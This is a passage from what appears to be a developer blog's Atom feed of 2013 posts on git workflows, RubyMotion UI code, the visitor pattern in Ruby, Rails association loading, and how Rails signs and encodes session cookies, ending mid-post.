this hook execute following command on all repositories.</p><pre><code class="language-plaintext">$ git initReinitialized existing Git repository in /Users/nsingh/dev/projects/streetcommerce/.git/</code></pre><p>Now if you look into the <code>.git/hooks</code> directory of your project you should see afile called <code>pre-push</code>.</p><pre><code class="language-plaintext">$ ls .git/hooks/pre-push.git/hooks/pre-push</code></pre><p>It means this project is all set with <code>pre-push</code> hook.</p><h2>New repositories</h2><p>When you clone a repository then <code>git init</code> is invoked automatically and youwill get <code>pre-push</code> already copied for you. So you are all set for all futurerepositories too.</p><h2>How to ignore pre-push hook</h2><p>To ignore <code>pre-push</code> hook all you need to do is</p><pre><code class="language-plaintext"># Use following command to ignore pre-push check and to force update master.git push master --force --no-verify</code></pre><p><a href="https://github.com/bigbinary/tiny_scripts/blob/master/git-hooks/hooks/pre-push">The hook is here</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[How to keep your fork up-to-date]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/how-to-keep-your-fork-uptodate"/>
      <updated>2013-09-13T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/how-to-keep-your-fork-uptodate</id>
      <content type="html"><![CDATA[<p>Let's say that I'm forking repo <code>rails/rails</code>. After the repo has been forked tomy repository I will clone it on my local machine.</p><pre><code class="language-plaintext">git clone git@github.com:neerajsingh0101/rails.git</code></pre><p>Now <code>cd rails</code> and execute <code>git remote -v</code> . This is what I see.</p><pre><code class="language-plaintext">origin git@github.com:neerajsingh0101/rails.git (fetch)origin git@github.com:neerajsingh0101/rails.git (push)</code></pre><p>Now I will add <code>upstream remote</code> by executing following command.</p><pre><code class="language-plaintext">git remote add upstream git@github.com/rails/rails.git</code></pre><p>After having done that when I execute <code>git remote -v</code> then I see</p><pre><code class="language-plaintext">origin git@github.com:neerajsingh0101/rails.git (fetch)origin git@github.com:neerajsingh0101/rails.git (push)upstream git://github.com/rails/rails.git (fetch)upstream git://github.com/rails/rails.git (push)</code></pre><p>Now I want to make some changes to the code. After all this is why I forked therepo.</p><p>Let's say that I want to add exception handling to the forked code I havelocally. Then I create a branch called <code>exception-handling</code> and make all yourchanges in this branch. <strong>The key here is to not to make any changes to <code>master</code>branch</strong>. I try to keep master of my forked repository in sync with the masterof the original repository where I forked it.</p><p>So now let's create a branch and I will put in all my changes there.</p><pre><code class="language-plaintext">git checkout -b exception-handling</code></pre><p>In the <code>Gemfile</code> I will use this code like this</p><pre><code class="language-plaintext">gem 'rails', github: 'neerajsingh0101/rails', branch: 'exception-handling'</code></pre><p>A month has passed. In the meantime rails master has tons of changes. I wantthose changes in my <code>exception-handling</code> branch. In order to achieve that firstI need to bring my local master up-to-date with rails master.</p><p>I need to switch to master branch and then I need to execute following commands.</p><pre><code class="language-plaintext">git checkout mastergit fetch upstreamgit rebase upstream/mastergit push</code></pre><p>Now the master of forked repository is in-sync with the master of <code>rails/rails</code>.Now that master is up-to-date I need to pull in the changes in master in my<code>exception-handling</code> branch.</p><pre><code class="language-plaintext">git checkout exception-handlinggit rebase mastergit push -f</code></pre><p>Now my branch <code>exception-handling</code> has my fix on top of rails master.</p>]]></content>
    </entry><entry>
       <title><![CDATA[How to setup Pinch to Zoom for an image in RubyMotion]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/pinch-to-zoom-for-an-image-in-rubymotion"/>
      <updated>2013-08-27T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/pinch-to-zoom-for-an-image-in-rubymotion</id>
      <content type="html"><![CDATA[<p>In this post we will see how to build &quot;pinch to zoom&quot; functionality to zoom inan image in RubyMotion.</p><p>First let's add a <code>UIViewController</code> that is initialized with an image.</p><pre><code class="language-ruby">class ImageViewController &lt; UIViewController  def initWithImage(image)    @image = image  endend</code></pre><h2>UIScrollView and UIImageView</h2><p>Now, we will add a <code>UIScrollView</code> with frame size set to full screen size andsome other properties as listed below.</p><pre><code class="language-ruby">scrollView = UIScrollView.alloc.initWithFrame(UIScreen.mainScreen.bounds)scrollView.scrollEnabled = falsescrollView.clipsToBounds = truescrollView.contentSize = @image.sizescrollView.minimumZoomScale = 1.0scrollView.maximumZoomScale = 4.0scrollView.zoomScale = 0.3</code></pre><p>Create a new <code>UIImageView</code> and add it to the scrollView created above.</p><pre><code class="language-ruby">imageView = UIImageView.alloc.initWithImage(@image)imageView.contentMode = UIViewContentModeScaleAspectFitimageView.userInteractionEnabled = trueimageView.frame = scrollView.bounds</code></pre><p>We are setting the image view's content mode to<code>UIViewContentModeScaleAspectFit</code>. Content mode can be set to either<code>UIViewContentModeScaleToFill</code>, <code>UIViewContentModeAspectFill</code> or<code>UIViewContentModeScaleAspectFit</code> depending on what suits your app. By default,<code>contentMode</code> property for most views is set to <code>UIViewContentModeScaleToFill</code>,which causes the views contents to be scaled to fit the new frame size.<a href="https://developer.apple.com/library/ios/documentation/windowsviews/conceptual/viewpg_iphoneos/WindowsandViews/WindowsandViews.html">This Apple doc</a>explains this behavior.</p><p>We need to add the above imageView as a subview to our scrollView.</p><pre><code class="language-ruby">scrollView.addSubview(imageView)self.view.addSubview(@scrollView)</code></pre><p>This is how our controller looks with all the above additions.</p><pre><code class="language-ruby">class ImageViewController &lt; UIViewController  def initWithImage(image)    @image = image    scrollView = UIScrollView.alloc.initWithFrame(UIScreen.mainScreen.bounds)    scrollView.scrollEnabled = false    scrollView.clipsToBounds = true    scrollView.contentSize = @image.size    scrollView.minimumZoomScale = 1.0    scrollView.maximumZoomScale = 4.0    scrollView.zoomScale = 0.3    scrollView.delegate = self    imageView = UIImageView.alloc.initWithImage(@image)    imageView.contentMode = UIViewContentModeScaleToFill    imageView.userInteractionEnabled = true    imageView.frame = scrollView.bounds    init  endend</code></pre><h2>ScrollView delegate</h2><p>We must set a delegate for our scroll view to support zooming. The delegateobject must conform to the <code>UIScrollViewDelegate</code> protocol. This is the reasonwe are setting scrollView.delegate = self above. The delegate class mustimplement <code>viewForZoomingInScrollView</code> and <code>scrollViewDidZoom</code> methods.</p><pre><code class="language-ruby">def viewForZoomingInScrollView(scrollView)  scrollView.subviews.firstenddef scrollViewDidZoom(scrollView)  if scrollView.zoomScale != 1.0    scrollView.scrollEnabled = true  else    scrollView.scrollEnabled = false  endend</code></pre><p>These two methods added above allow the scrollView to support pinch to zoom.</p><h2>Supporting orientation changes</h2><p>There is one more thing to do if we want to support orientations changes. Weneed to add the following methods:</p><pre><code class="language-ruby">def shouldAutorotateToInterfaceOrientation(*)  trueenddef viewDidLayoutSubviews  @scrollView.frame = self.view.boundsend</code></pre><p>We have to set the scrollView's frame to view bounds in <code>viewDidLayoutSubviews</code>so that the scrollView frame is resized when the device orientation changes.</p><p>That's it. With all those changes now our app supports orientation change andnow we are able to pinch and zoom images.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Fix image orientation issue in RubyMotion]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/rubymotion-image-orientation"/>
      <updated>2013-08-04T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rubymotion-image-orientation</id>
      <content type="html"><![CDATA[<p>I'm building an app using RubyMotion. When I take picture then it all looksgood. However when the picture is posted on web then the orientation of thepicture is different.</p><h2>UIImage and UIImageOrientation</h2><p><a href="https://developer.apple.com/library/ios/documentation/uikit/reference/UIImage_Class/Reference/Reference.html">UIImage</a>in iOS has a property called UIImageOrientation. Image orientation affects theway the image data is displayed when drawn. The api docs mention that bydefault, images are displayed in the <code>up</code> orientation. However, if the image hasassociated metadata (such as EXIF information), then this property contains theorientation indicated by that metadata.</p><p>After using<a href="https://developer.apple.com/library/ios/documentation/uikit/reference/UIImagePickerController_Class/UIImagePickerController/UIImagePickerController.html">UIImagePickerController</a>to take an image using the iPhone camera, I was using BubbleWrap to send theimage to a webserver. When the image is taken in landscape/portrait mode, thenthe image appeared fine when it is viewed in the browser. But, when the image issent back via api and is shown on the iphone, the image is rotated by 90 degreesif the image is taken in portrait mode. In exif metadata, iOS incorrectly setsthe orientation to UIImageOrientationRight .</p><p>Here is how I fixed the image orientation issue:</p><pre><code class="language-ruby">if image.imageOrientation == UIImageOrientationUp  return_image = imageelse  UIGraphicsBeginImageContextWithOptions(image.size, false, image.scale)  image.drawInRect([[0,0], image.size])  normalized_image = UIImage.UIGraphicsGetImageFromCurrentImageContext  UIGraphicsEndImageContext()  return_image = normalized_imageend</code></pre><p>First, we are checking the image orientation of the image we have in hand. Ifthe image orientation is UIImageOrientationUp, we don't have to change anything.Otherwise we are redrawing the image and returning the normalized image.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Visitor pattern and double dispatch in ruby]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/visitor-pattern-and-double-dispatch"/>
      <updated>2013-07-07T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/visitor-pattern-and-double-dispatch</id>
      <content type="html"><![CDATA[<p>Let's say that we have an AST that holds integer nodes. We want to print doublethe value of all nodes. We can do something like this</p><pre><code class="language-ruby">class IntegerNode  def initialize(value)    @value = value  end  def double    @value * 2  endendclass Ast  def initialize    @nodes = []    @nodes &lt;&lt; IntegerNode.new(2)    @nodes &lt;&lt; IntegerNode.new(3)  end  def print_double    @nodes.each do |node|      puts node.double    end  endendast = Ast.newast.print_double # =&gt; 4 6</code></pre><p>Above solution works. Now let's try to print triple the value. In order to dothat we need to change class <code>IntegerNode</code>. And <code>IntegerNode</code> has knowledge ofhow to print <code>triple</code> value. Tomorrow if we have another node called <code>FloatNode</code>then that node will have knowledge about how to <code>double</code> and <code>triple</code> the value.</p><p>Nodes are merely storing information. And the representation of data should beseparate from the data itself. So <code>IntegerNode</code> and <code>FloatNode</code> should not knowabout how to <code>double</code> and <code>triple</code>.</p><p>To take the data representation code out of nodes we can make use of<a href="http://en.wikipedia.org/wiki/Visitor_pattern">visitor pattern</a> . Visitorpattern uses <a href="http://en.wikipedia.org/wiki/Double_dispatch">double dispatch</a> .</p><p>Before we look at &quot;double dispatch&quot; let's first look at &quot;single dispatch&quot;.</p><h2>Single dispatch</h2><p>When we invoke a method in ruby we are using single dispatch. In singledispatch, method invocation is done based on a single criteria: class of theobject. Most of the object oriented programming languages use <code>single dispatch</code>system.</p><p>In the following case method <code>double</code> is invoked solely based on the class of<code>node</code>.</p><pre><code class="language-ruby">node.double</code></pre><h2>Double dispatch</h2><p>As the name suggests in the case of <code>Double dispatch</code> dispatching depends on twothings: class of the object and the class of the input object.</p><p>Ruby inherently does not support &quot;Double dispatch&quot;. We will see how to getaround that issue shortly. First let's see an example in Java which supportDouble dispatch. Java supports <code>method overloading</code> which allows two methodswith same name to differ only in the type of argument it receives.</p><pre><code class="language-java">class Node   def double(Integer value); value *2; end   def double(String value); Integer.parseInt(value) * 2; endendnode.double(2)node.double(&quot;51&quot;)</code></pre><p>In the above case the method that would be invoked is decided based on twothings: class of the object ( node ) and the class of the value (Integer orString). That's why this is called <code>Double dispatch</code>.</p><p>In ruby we can't have two methods with same name and different signature becausethe second method would override the first method. In order to get around thatlimitation usually the method name has class name. Let's try to write above javacode in ruby.</p><pre><code class="language-ruby">class Node  def accept value   method_name = &quot;visit_#{value.class}&quot;   send method_name  end  def visit_Integer value   value * 2  end  def visit_String value    value.to_i * 2  endend</code></pre><p>If the above code is not very clear then don't worry. We are going to look atvisitor pattern in ruby and that will make the above code clearer.</p><h2>Visitor pattern</h2><p>Now let's get back to the problem of traversing the AST. This time we are goingto use &quot;Double dispatch&quot; so that node information is separate fromrepresentation information.</p><p>In visitor pattern <code>nodes</code> define a method called <code>accept</code>. That method acceptsthe visitor and then that method calls <code>visit</code> on visitor passing itself asself.</p><p>Below is a concrete example of visitor pattern. You can see that <code>IntegerNode</code>has method <code>accepts</code> which takes an instance of <code>visitor</code> as argument. And then<code>visit</code> method of visitor is invoked.</p><pre><code class="language-ruby">class Node  def accept visitor    raise NotImpelementedError.new  endendmodule Visitable  def accept visitor    visitor.visit self  endendclass IntegerNode &lt; Node  include Visitable  attr_reader :value  def initialize value    @value = value  endendclass Ast &lt; Node  def initialize    @nodes = []    @nodes &lt;&lt; IntegerNode.new(2)    @nodes &lt;&lt; IntegerNode.new(3)  end  def accept visitor    @nodes.each do |node|      node.accept visitor    end  endendclass DoublerVisitor  def visit subject    puts subject.value * 2  endendclass TriplerVisitor  def visit subject    puts subject.value * 3  endendast = Ast.newputs &quot;Doubler:&quot;ast.accept DoublerVisitor.newputs &quot;Tripler:&quot;ast.accept TriplerVisitor.new# =&gt;Doubler:46Tripler:69</code></pre><p>Above code used only <code>IntegerNode</code>. In the next example I have added<code>StringNode</code>. Now notice how the <code>visit</code> method changed. Now based on the classof the argument the method to dispatch is being decided.</p><pre><code class="language-ruby">class Node  def accept visitor    raise NotImpelementedError.new  endendmodule Visitable  def accept visitor    visitor.visit(self)  endendclass IntegerNode &lt; Node  include Visitable  attr_reader :value  def initialize value    @value = value  endendclass StringNode &lt; Node  include Visitable  attr_reader :value  def initialize value    @value = value  endendclass Ast &lt; Node  def initialize    @nodes = []    @nodes &lt;&lt; IntegerNode.new(2)    @nodes &lt;&lt; StringNode.new(&quot;3&quot;)  end  def accept visitor    @nodes.each do |node|      node.accept visitor    end  endendclass BaseVisitor  def visit subject    method_name = &quot;visit_#{subject.class}&quot;.intern    send(method_name, subject )  endendclass DoublerVisitor &lt; BaseVisitor  def visit_IntegerNode subject    puts subject.value * 2  end  def visit_StringNode subject    puts subject.value.to_i * 2  endendclass TriplerVisitor &lt; BaseVisitor  def visit_IntegerNode subject    puts subject.value * 3  end  def visit_StringNode subject    puts subject.value.to_i * 3  endendast = Ast.newputs &quot;Doubler:&quot;ast.accept DoublerVisitor.newputs &quot;Tripler:&quot;ast.accept TriplerVisitor.new# =&gt;Doubler:46Tripler:69</code></pre><h2>Real world usage</h2><p><a href="https://github.com/rails/arel">Arel</a> uses visitor pattern to build querytailored to the specific database. You can see that it has a visitor class for<a href="https://github.com/rails/rails/blob/master/activerecord/lib/arel/visitors/sqlite.rb">sqlite3</a>,<a href="https://github.com/rails/rails/blob/master/activerecord/lib/arel/visitors/mysql.rb">mysql</a>and<a href="https://github.com/rails/rails/blob/master/activerecord/lib/arel/visitors/postgresql.rb">Postgresql</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Preload, Eagerload, Includes and Joins]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/preload-vs-eager-load-vs-joins-vs-includes"/>
      <updated>2013-07-01T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/preload-vs-eager-load-vs-joins-vs-includes</id>
      <content type="html"><![CDATA[<p>Rails provides four different ways to load association data. In this blog we aregoing to look at each of those.</p><h2>Preload</h2><p>Preload loads the association data in a separate query.</p><pre><code class="language-ruby">User.preload(:posts).to_a# =&gt;SELECT &quot;users&quot;.* FROM &quot;users&quot;SELECT &quot;posts&quot;.* FROM &quot;posts&quot;  WHERE &quot;posts&quot;.&quot;user_id&quot; IN (1)</code></pre><p>This is how <code>includes</code> loads data in the default case.</p><p>Since <code>preload</code> always generates two sql we can't use <code>posts</code> table in wherecondition. Following query will result in an error.</p><pre><code class="language-ruby">User.preload(:posts).where(&quot;posts.desc='ruby is awesome'&quot;)# =&gt;SQLite3::SQLException: no such column: posts.desc:SELECT &quot;users&quot;.* FROM &quot;users&quot;  WHERE (posts.desc='ruby is awesome')</code></pre><p>With preload where clauses can be applied.</p><pre><code class="language-ruby">User.preload(:posts).where(&quot;users.name='Neeraj'&quot;)# =&gt;SELECT &quot;users&quot;.* FROM &quot;users&quot;  WHERE (users.name='Neeraj')SELECT &quot;posts&quot;.* FROM &quot;posts&quot;  WHERE &quot;posts&quot;.&quot;user_id&quot; IN (3)</code></pre><h3>Includes</h3><p>Includes loads the association data in a separate query just like <code>preload</code>.</p><p>However it is smarter than <code>preload</code>. Above we saw that <code>preload</code> failed forquery <code>User.preload(:posts).where(&quot;posts.desc='ruby is awesome'&quot;)</code>. Let's trysame with includes.</p><pre><code class="language-ruby">User.includes(:posts).where('posts.desc = &quot;ruby is awesome&quot;').to_a# =&gt;SELECT &quot;users&quot;.&quot;id&quot; AS t0_r0, &quot;users&quot;.&quot;name&quot; AS t0_r1, &quot;posts&quot;.&quot;id&quot; AS t1_r0,       &quot;posts&quot;.&quot;title&quot; AS t1_r1,       &quot;posts&quot;.&quot;user_id&quot; AS t1_r2, &quot;posts&quot;.&quot;desc&quot; AS t1_r3FROM &quot;users&quot; LEFT OUTER JOIN &quot;posts&quot; ON &quot;posts&quot;.&quot;user_id&quot; = &quot;users&quot;.&quot;id&quot;WHERE (posts.desc = &quot;ruby is awesome&quot;)</code></pre><p>As you can see <code>includes</code> switches from using two separate queries to creating asingle <code>LEFT OUTER JOIN</code> to get the data. And it also applied the suppliedcondition.</p><p>So <code>includes</code> changes from two queries to a single query in some cases. Bydefault for a simple case it will use two queries. Let's say that for somereason you want to force a simple <code>includes</code> case to use a single query insteadof two. Use <code>references</code> to achieve that.</p><pre><code class="language-ruby">User.includes(:posts).references(:posts).to_a# =&gt;SELECT &quot;users&quot;.&quot;id&quot; AS t0_r0, &quot;users&quot;.&quot;name&quot; AS t0_r1, &quot;posts&quot;.&quot;id&quot; AS t1_r0,       &quot;posts&quot;.&quot;title&quot; AS t1_r1,       &quot;posts&quot;.&quot;user_id&quot; AS t1_r2, &quot;posts&quot;.&quot;desc&quot; AS t1_r3FROM &quot;users&quot; LEFT OUTER JOIN &quot;posts&quot; ON &quot;posts&quot;.&quot;user_id&quot; = &quot;users&quot;.&quot;id&quot;</code></pre><p>In the above case a single query was done.</p><h2>Eager load</h2><p>eager loading loads all association in a single query using <code>LEFT OUTER JOIN</code>.</p><pre><code class="language-ruby">User.eager_load(:posts).to_a# =&gt;SELECT &quot;users&quot;.&quot;id&quot; AS t0_r0, &quot;users&quot;.&quot;name&quot; AS t0_r1, &quot;posts&quot;.&quot;id&quot; AS t1_r0,       &quot;posts&quot;.&quot;title&quot; AS t1_r1, &quot;posts&quot;.&quot;user_id&quot; AS t1_r2, &quot;posts&quot;.&quot;desc&quot; AS t1_r3FROM &quot;users&quot; LEFT OUTER JOIN &quot;posts&quot; ON &quot;posts&quot;.&quot;user_id&quot; = &quot;users&quot;.&quot;id&quot;</code></pre><p>This is exactly what <code>includes</code> does when it is forced to make a single querywhen <code>where</code> or <code>order</code> clause is using an attribute from <code>posts</code> table.</p><h2>Joins</h2><p>Joins brings association data using <code>inner join</code>.</p><pre><code class="language-ruby">User.joins(:posts)# =&gt;SELECT &quot;users&quot;.* FROM &quot;users&quot; INNER JOIN &quot;posts&quot; ON &quot;posts&quot;.&quot;user_id&quot; = &quot;users&quot;.&quot;id&quot;</code></pre><p>In the above case no posts data is selected. Above query can also produceduplicate result. To see it let's create some sample data.</p><pre><code class="language-ruby">def self.setup  User.delete_all  Post.delete_all  u = User.create name: 'Neeraj'  u.posts.create! title: 'ruby', desc: 'ruby is awesome'  u.posts.create! title: 'rails', desc: 'rails is awesome'  u.posts.create! title: 'JavaScript', desc: 'JavaScript is awesome'  u = User.create name: 'Neil'  u.posts.create! title: 'JavaScript', desc: 'Javascript is awesome'  u = User.create name: 'Trisha'end</code></pre><p>With the above sample data if we execute <code>User.joins(:posts)</code> then this is theresult we get</p><pre><code class="language-plaintext">#&lt;User id: 9, name: &quot;Neeraj&quot;&gt;#&lt;User id: 9, name: &quot;Neeraj&quot;&gt;#&lt;User id: 9, name: &quot;Neeraj&quot;&gt;#&lt;User id: 10, name: &quot;Neil&quot;&gt;</code></pre><p>We can avoid the duplication by using <code>distinct</code> .</p><pre><code class="language-ruby">User.joins(:posts).select('distinct users.*').to_a</code></pre><p>Also if we want to make use of attributes from <code>posts</code> table then we need toselect them.</p><pre><code class="language-ruby">records = User.joins(:posts).select('distinct users.*, posts.title as posts_title').to_arecords.each do |user|  puts user.name  puts user.posts_titleend</code></pre><p>Note that using <code>joins</code> means if you use <code>user.posts</code> then another query will beperformed.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Background/header for Formotion forms in RubyMotion]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/set-formotion-background-and-header"/>
      <updated>2013-06-08T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/set-formotion-background-and-header</id>
      <content type="html"><![CDATA[<p><a href="https://github.com/clayallsopp/formotion">Formotion</a> for<a href="http://www.rubymotion.com/">Rubymotion</a> makes it a breeze to create views withforms. I am building a rubymotion app and my login form uses formotion. I neededto set background color for my form and here is how you can set a backgroundcolor for a form created using Formotion.</p><pre><code class="language-ruby">class LoginViewController &lt; Formotion::FormController  def viewDidLoad    super    view = UIView.alloc.init    view.backgroundColor = 0x838E61.uicolor    self.tableView.backgroundView = view  endend</code></pre><p>After the login view is done loading, I'm creating a new UIView and setting itsbackground color. Then this UIView object is set as the background view toformotion's table view.</p><h2>Setting header image</h2><p>If you want to add some branding to the login form, you can add a image to theform's header by adding the below code to <code>viewDidLoad</code>:</p><pre><code class="language-ruby">header_image = UIImage.imageNamed('header_image_name.png')header_view = UIImageView.alloc.initWithImage(header_image)self.tableView.tableHeaderView = header_view</code></pre><p>We are creating a <code>UIImageView</code> and initializing it with the image we want toshow in the header. Now, set the tableview's tableHeaderView value to theUIImageView we created.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Cookies on Rails]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/cookies-on-rails"/>
      <updated>2013-03-19T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/cookies-on-rails</id>
      <content type="html"><![CDATA[<p>Let's see how session data is handled in Rails 3.2 .</p><p>If you generate a Rails application in 3.2 then ,by default, you will see a fileat <code>config/initializers/session_store.rb</code>. The contents of this file issomething like this.</p><pre><code class="language-ruby">Demo::Application.config.session_store :cookie_store, key: '_demo_session'</code></pre><p>As we can see <code>_demo_session</code> is used as the key to store cookie data.</p><p>A single site can have cookies under different key. For example airbnb is using14 different keys to store cookie data.</p><p><img src="/blog_images/2013/cookies-on-rails/airbnb.png" alt="airbnb cookies"></p><h3>Session information</h3><p>Now let's see how Rails 3.2.13 stores session information.</p><p>In <code>3.2.13</code> version of Rails application I added following line to createsession data.</p><pre><code class="language-ruby">session[:github_username] = 'neerajsingh0101'</code></pre><p>Then I visit the action that executes above code. Now if I go and look forcookies for <code>localhost:3000</code> then this is what I see .</p><p><img src="/blog_images/2013/cookies-on-rails/Screenshot_3_19_13_11_33_PM.png" alt="demo session"></p><p>As you can see I have only one cookie with key <code>_demo_session</code> .</p><h2>Deciphering content of the cookie</h2><p>The cookie has following data.</p><pre><code class="language-plaintext">BAh7CEkiD3Nlc3Npb25faWQGOgZFRkkiJTgwZGFiNzhiYWZmYTc3NjU1ZmVmMGUxM2EzYmEyMDhhBjsAVEkiFGdpdGh1Yl91c2VybmFtZQY7AEZJIhJuZWVyYWpkb3RuYW1lBjsARkkiEF9jc3JmX3Rva2VuBjsARkkiMU1KTCs2dXVnRFo2R2NTdG5Kb3E2dm5BclZYRGJGbjJ1TXZEU0swamxyWU09BjsARg%3D%3D--b5bcce534ceab56616d4a215246e9eb1fc9984a4</code></pre><p>Let's open <code>rails console</code> and try to decipher this information.</p><pre><code class="language-ruby">content = 'BAh7CEkiD3Nlc3Npb25faWQGOgZFRkkiJTgwZGFiNzhiYWZmYTc3NjU1ZmVmMGUxM2EzYmEyMDhhBjsAVEkiFGdpdGh1Yl91c2VybmFtZQY7AEZJIhJuZWVyYWpkb3RuYW1lBjsARkkiEF9jc3JmX3Rva2VuBjsARkkiMU1KTCs2dXVnRFo2R2NTdG5Kb3E2dm5BclZYRGJGbjJ1TXZEU0swamxyWU09BjsARg%3D%3D--b5bcce534ceab56616d4a215246e9eb1fc9984a4'</code></pre><p>When the content is written to cookie then it is escaped. So first we need to<code>unescape</code> it.</p><pre><code class="language-ruby">&gt; unescaped_content = URI.unescape(content)=&gt; &quot;BAh7CEkiD3Nlc3Npb25faWQGOgZFRkkiJTgwZGFiNzhiYWZmYTc3NjU1ZmVmMGUxM2EzYmEyMDhhBjsAVEkiFGdpdGh1Yl91c2VybmFtZQY7AEZJIhJuZWVyYWpkb3RuYW1lBjsARkkiEF9jc3JmX3Rva2VuBjsARkkiMU1KTCs2dXVnRFo2R2NTdG5Kb3E2dm5BclZYRGJGbjJ1TXZEU0swamxyWU09BjsARg==--b5bcce534ceab56616d4a215246e9eb1fc9984a4&quot;</code></pre><p>Notice that towards the end <code>unescaped_content</code> has <code>--</code> . That is a separationmarker. The value before <code>--</code> is the real payload. The value after <code>--</code> isdigest of data.</p><pre><code class="language-ruby">&gt; data, digest = unescaped_content.split('--')=&gt; [&quot;BAh7CEkiD3Nlc3Npb25faWQGOgZFRkkiJTgwZGFiNzhiYWZmYTc3NjU1ZmVmMGUxM2EzYmEyMDhhBjsAVEkiFGdpdGh1Yl91c2VybmFtZQY7AEZJIhJuZWVyYWpkb3RuYW1lBjsARkkiEF9jc3JmX3Rva2VuBjsARkkiMU1KTCs2dXVnRFo2R2NTdG5Kb3E2dm5BclZYRGJGbjJ1TXZEU0swamxyWU09BjsARg==&quot;, &quot;b5bcce534ceab56616d4a215246e9eb1fc9984a4&quot;]</code></pre><p>The data is <code>Base64</code> encoded. So let's unecode it.</p><pre><code class="language-ruby">&gt; Marshal.load(::Base64.decode64(data))=&gt; {&quot;session_id&quot;=&gt;&quot;80dab78baffa77655fef0e13a3ba208a&quot;,    &quot;github_username&quot;=&gt;&quot;neerajsingh0101&quot;,    &quot;_csrf_token&quot;=&gt;&quot;MJL+6uugDZ6GcStnJoq6vnArVXDbFn2uMvDSK0jlrYM=&quot;}</code></pre><p>So we are able to get the data that is stored in cookie. However we can't tamperwith the cookie because if we change the cookie data then the digest will notmatch.</p><p>Now let's see how Rails matches the digest.</p><p>In order to create the digest Rails makes of use of<code>config/initializer/secret_token.rb</code> . In my case the file has followingcontent.</p><pre><code class="language-ruby">Demo::Application.config.secret_token = '111111111111111111111111111111'</code></pre><p>This secret token is used to create the digest.</p><pre><code class="language-ruby">&gt; secret_token =  '111111111111111111111111111111'&gt; OpenSSL::HMAC.hexdigest(OpenSSL::Digest.const_get('SHA1').new, secret_token, data)=&gt; &quot;b5bcce534ceab56616d4a215246e9eb1fc9984a4&quot;</code></pre><p>Notice that the result of above produces a value that is same as <code>digest</code> inearlier step. So if cookie data is tampered with then the digest match willfail. This is why it is absolute necessary that attacker should not be able toget access to <code>secret_token</code> value.</p><p>Did you notice that we can access the cookie data without needing<code>secret_token</code>. It means the data stored in cookie is not encrypted and anyonecan see it. That is why it is recommended that application should not store anysensitive information in cookie .</p><h2>Using cookie gives you more control</h2><p>In the previous example we used <code>session</code> to store and retrieve data fromcookie. We can directly use <code>cookie</code> and that gives us a little bit morecontrol.</p><h2>Using unsigned cookie</h2><pre><code class="language-ruby">cookies[:github_username] = 'neerajsingh0101'</code></pre><p>Now if we look at cookie stored in browser then this is what we see.</p><p><img src="/blog_images/2013/cookies-on-rails/Screenshot_3_20_13_9_49_PM.png" alt="update cookie"></p><p>As you can see now we have two keys in our cookie. One created by <code>session</code> andthe other one created by code written above.</p><p>Another thing to note is that the data stored for key <code>github_username</code> is not<code>Base64encoded</code> and it also does not have <code>--</code> to separate the data from thedigest. It means this type of cookie data can be tampered with by the user andthe Rails application will not be able to detect that the data has been tamperedwith.</p><p>Now let's try to sign the cookie data to make it tamper proof.</p><pre><code class="language-ruby">cookies.signed[:twitter_username] = 'neerajsingh0101'</code></pre><p>Now let's look at cookies in browser.</p><p><img src="/blog_images/2013/cookies-on-rails/Screenshot_3_20_13_9_54_PM.png" alt="update cookies"></p><p>This time we got data with another key <code>twitter_username</code> . Another thing tonotice is that cookie data is signed and is tamper proof.</p><p>When we use <code>session</code> then behind the scene it uses <code>cookies.signed</code>. That's whywe end up seeing signed data for key <code>_demo_session</code> .</p><h2>Tampering signed cookie</h2><p>What happens when user tampers with signed cookie data.</p><p>Rails does not raise any exception. However when you try to access cookie datathen nil is returned because the data has been tampered with.</p><h2>Security should be on by default</h2><p>session , by default, uses signed cookies which prevents any kind of tamperingof data but the data is still visible to users. It means we can't storesensitive information in session.</p><p>It would be nice if the session data is stored in encrypted format. And that'sthe topic of our next discussion.</p><h2>Rails 4 stores session data in encrypted format</h2><p>If you generate a Rails application in Rails 4 then ,by default, you will see afile at <code>config/initializers/session_store.rb</code> . The contents of this file issomething like</p><pre><code class="language-ruby">Demo::Application.config.session_store :cookie_store, key: '_demo_session'</code></pre><p>Also you will notice that file at <code>config/initializers/secret_token.rb</code> lookslike this .</p><pre><code class="language-ruby">Demo::Application.config.secret_key_base = 'b14e9b5b720f84fe02307ed16bc1a32ce6f089e10f7948422ccf3349d8ab586869c11958c70f46ab4cfd51f0d41043b7b249a74df7d53c7375d50f187750a0f5'</code></pre><p>Notice that in Rails 3.2.x the key was <code>secret_token</code>. Now the key is<code>secret_key_base</code> .</p><pre><code class="language-ruby">session[:github_username] = 'neerajsingh0101'</code></pre><p><img src="/blog_images/2013/cookies-on-rails/Screenshot_3_22_13_4_13_PM.png" alt="cookies and site data"></p><p>Cookie has following data.</p><pre><code 